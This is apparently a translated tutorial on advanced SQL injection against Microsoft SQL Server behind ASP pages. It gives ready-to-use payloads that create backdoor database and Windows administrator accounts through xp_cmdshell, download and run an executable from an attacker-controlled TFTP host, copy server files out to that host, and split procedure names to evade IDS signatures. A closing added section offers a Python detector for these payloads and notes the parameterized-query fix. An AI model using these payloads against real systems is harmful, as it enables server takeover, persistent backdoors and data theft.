Now I will share some advanced injection techniques for experienced readers.

Preface: Basic injection methods are not covered in detail here. If something is unclear, see the basic injection articles. To make better use of injection, reading the SQL syntax articles on this site is recommended.

[Get all database names]
select name from master.dbo.sysdatabases where dbid = 7 // a dbid of 7 or more is a user database

[Get a data table name] [Update a field's value to the table name, then read that field to get the table name]
select top 1 name from database_name.dbo.sysobjects where xtype = 'u' and status > 0 and name not in ('Table')

[Get data table field names] [Update a field's value to the field name, then read that field to get the field name]
select top 1 database_name.dbo.col_name(object_id('name of the data table to query'), column number, such as: 1) [where condition]

[Use the vulnerability to create a database administrator account and a system administrator account through the SQL Server account] [The current account must be in the sysadmin group]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- // adds database user test with password test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- // to change the password, use this statement (changes test's password to 123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- // adds test to the sysadmin group; members of this group can execute any operation
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- // adds system user test with password test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- // adds system user test to the administrators group

At this point you have left a test administrator account in both his database and his system.

[Download file.exe from your own machine and run it] [Prerequisite: you must set your computer up as a TFTP server with port 69 open]
id=2;exec master.dbo.xp_cmdshell 'tftp -i YourIP get file.exe';--
Then run the file:
id=2;exec master.dbo.xp_cmdshell 'file.exe';--
Download the server's file file2.doc to the local TFTP server [the file must exist]:
id=2;exec master.dbo.xp_cmdshell 'tftp -i YourIP put file2.doc';--

[Bypassing IDS detection] [Use variables]
declare @a sysname set @a = 'xp_' + 'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a = 'xp' + '_cm' + 'dshell' exec @a 'dir c:\'

New: create a table with only one field, of type image, and write the contents of the ASP file into it.
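
A defender's view of the variable-concatenation trick above, as an added example that is not part of the original article: a signature applied to the raw query string misses `'xp'+'_cm'+'dshell'`, while decoding, lower-casing and folding the concatenation before matching catches it. The function names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Procedure names taken from the payloads shown on this page.
SENSITIVE = ("xp_cmdshell", "sp_addlogin", "sp_password", "sp_addsrvrolemember")

# 'xp_'+'cmdshell' -> 'xp_cmdshell': drop the quote-plus-quote joint.
CONCAT = re.compile(r"'\s*\+\s*'")
# A statement separator followed by exec/declare inside a parameter value.
STACKED = re.compile(r";\s*(exec|declare)\b")


def normalize(query: str) -> str:
    """URL-decode, lower-case and fold T-SQL string concatenation."""
    text = unquote(query).lower()
    return CONCAT.sub("", text)


def inspect(query: str) -> list[str]:
    """Return the reasons a query string resembles the page's payloads."""
    text = normalize(query)
    reasons = [f"procedure:{name}" for name in SENSITIVE if name in text]
    if STACKED.search(text):
        reasons.append("stacked-statement")
    return reasons


def naive_match(query: str) -> bool:
    """Signature check on the raw string, as a simple IDS rule would do."""
    return any(name in query for name in SENSITIVE)


# Constructed sample query strings (not real traffic).
SAMPLES = [
    "id=2",
    "id=2;EXEC%20MASTER.DBO.SP_ADDLOGIN%20test,test;--",
    "id=2;declare%20@a%20sysname%20set%20@a='xp'%2B'_cm'%2B'dshell'%20exec%20@a%20'dir%20c:%5C'",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"naive={naive_match(q)!s:5} normalized={inspect(q)}  {q}")
```

Matching on the normalized form is a detection aid only; the fix for the injection itself is to bind `id` as a typed parameter and to run the application under a login that is not in the sysadmin group.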